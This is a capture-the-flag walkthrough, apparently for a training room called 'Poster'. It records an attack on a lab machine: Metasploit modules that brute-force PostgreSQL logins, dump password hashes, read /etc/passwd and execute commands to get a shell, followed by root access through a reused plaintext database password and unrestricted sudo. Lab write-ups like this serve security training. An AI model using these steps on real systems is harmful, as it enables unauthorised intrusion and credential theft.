# Tasks
1. user.txt
2. root.txt

# NMAP SCAN
```nmap
PORT     STATE SERVICE    VERSION  
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)  
|   256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)  
|_  256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)  
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))  
|_http-title: Poster CMS  
|_http-server-header: Apache/2.4.18 (Ubuntu)  
5432/tcp open  postgresql PostgreSQL DB 9.5.8 - 9.5.10 or 9.5.17 - 9.5.21  
| ssl-cert: Subject: commonName=ubuntu  
| Not valid before: 2020-07-29T00:54:25  
|_Not valid after:  2030-07-27T00:54:25  
|_ssl-date: TLS randomness does not represent time  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

# Findings
### Web (Port 80)
1. Apache 2.4.18
2. No robots.txt

### DB (Port 5432)
1. We can [pentest](https://book.hacktricks.xyz/pentesting/pentesting-postgresql)
`psql -h <host> -U <username> -d <database> # Remote connection`
2. We can enumerate user credentials using Metasploit.
`auxiliary/scanner/postgres/postgres_login`

Found valid credentials :
`[+] 10.10.94.103:5432 - Login Successful: postgres:password@template1`

3. We can use another module to execute commands.
`auxiliary/admin/postgres/postgres_sql`
`PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit`

4. Now we can try dumping some hashes using another module
`auxiliary/scanner/postgres/postgres_hashdump`

```hash
 Username   Hash
 --------   ----
 darkstart  md58842b99375db43e9fdf238753623a27d
 poster     md578fb805c7412ae597b399844a54cce0a
 postgres   md532e12f215ba27cb750c9e093ce4b5127
 sistemas   md5f7dbc0d5a06653e74da6b1af9290ee2b
 ti         md57af9ac4c593e9e4f275576e13f935579
 tryhackme  md503aab1165001c8f8ccae31a8824efddc
```

5. We can also read files using a module
`auxiliary/admin/postgres/postgres_readfile`

```hash
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  
bin:x:2:2:bin:/bin:/usr/sbin/nologin  
sys:x:3:3:sys:/dev:/usr/sbin/nologin  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/usr/sbin/nologin  
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false  
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false  
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false  
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false  
syslog:x:104:108::/home/syslog:/bin/false  
_apt:x:105:65534::/nonexistent:/bin/false  
messagebus:x:106:110::/var/run/dbus:/bin/false  
uuidd:x:107:111::/run/uuidd:/bin/false  
alison:x:1000:1000:Poster,,,:/home/alison:/bin/bash  
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin  
postgres:x:109:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash  
dark:x:1001:1001::/home/dark:
```

6. We can also run another module for command injection.
`exploit/multi/postgres/postgres_copy_from_program_cmd_exec`

We now have a shell.

# Privilege Escalation
1. Found credentials in config.php
```php
<?php   
          
       $dbhost = "127.0.0.1";  
       $dbuname = "alison";  
       $dbpass = "p4ssw0rdS3cur3!#";  
       $dbname = "mysudopassword";  
?>
```
2. User Dark cannot run sudo 
3. DB password is reused for user alison, we are now user alison
4. Check sudo -l
`User alison may run the following commands on ubuntu:  
   (ALL : ALL) ALL`
   
5. Simply run `sudo /bin/bash ` for easy root.



